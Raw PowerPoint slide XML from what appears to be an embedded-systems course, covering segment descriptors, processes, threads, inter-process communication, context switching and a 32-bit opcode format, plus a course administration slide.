            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>P 		– Segment present</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>S 		– Descriptor type (0 = system; 1 = code or data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>TYPE 	– Segment type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21506" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1295400" y="1250950"/>
          <a:ext cx="6629400" cy="2497138"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s43012" name="Visio" r:id="rId3" imgW="6829349" imgH="2571293" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="6829349" imgH="257129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50950"/>
                        <a:ext cx="6629400" cy="2497138"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54523983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381000" y="501650"/>
          <a:ext cx="8382000" cy="6051550"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s44036" name="Visio" r:id="rId3" imgW="8831275" imgH="6376416" progId="Visio.Drawing.6">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="8831275" imgH="637641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01650"/>
                        <a:ext cx="8382000" cy="605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5" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>			Big Picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245128392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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is an instance of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A process has its own memory (code and data) that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>isolated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from the memory of other processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other resources (files, access to drivers) are also typically isolated from those of other processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exceptions exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A process may contain multiple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1373974180"/>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Inter-process Communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>IPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is handled by the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used to pass data, synchronize and signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Essentially mechanisms similar to the thread communication mechanisms discussed above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But implementation needs to take into account separate address spaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Think for example about a queue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148724689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Switch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Essentially similar to thread context switch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should also set the page tables (i.e. set CR3) / load the local segment descriptor table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14857710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Multithreading + Multiprocessing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 multi-processed environment, multithreading can be implemented in the kernel or in the process itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Kernel multithreading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>user multithreading</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that this is unrelated to threads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User MT may require support for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>signals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, or user-level interrupts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User MT will have more efficient context switching and synchronization (less kernel calls)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User MT may require less kernel support for synchronization and creating threads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User MT offers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>less parallelism</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in that if one thread suspends, the entire process suspends</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221960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lang="en-US" smtClean="0"/>
              <a:t>Administration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Embedded System Course, 3 pts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Lecture: Wed., 14:30-16:00, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>ויילר</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> 161</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Tirgul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Wed., 16:15-17:00 , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>בירן 203</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>omer.levy@intel.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Phone: 054-7887824</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>TA: Ari Yoskovitz (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ari.yoskovitz@intel.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Office hour – set meeting in advance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Grade – based on 5 (mandatory) programming exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example 32-bit Opcode Format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="939800" y="2425700"/>
            <a:ext cx="323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31</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="24257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27   26</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14341" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2311400" y="2425700"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14342" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4445000" y="24257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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14343" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5588000" y="2425700"/>
            <a:ext cx="145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1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1751048" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="4621887"/>
            <a:ext cx="2057400" cy="919401"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5093"/>
              <a:gd name="adj2" fmla="val -21939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Major Opcode defines 32 instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> groups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> 16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bit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s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1751049" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6578600" y="4824612"/>
            <a:ext cx="2359025" cy="510778"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1347"/>
              <a:gd name="adj2" fmla="val -39044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60 core register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>s available in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>3 Operand Fields </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
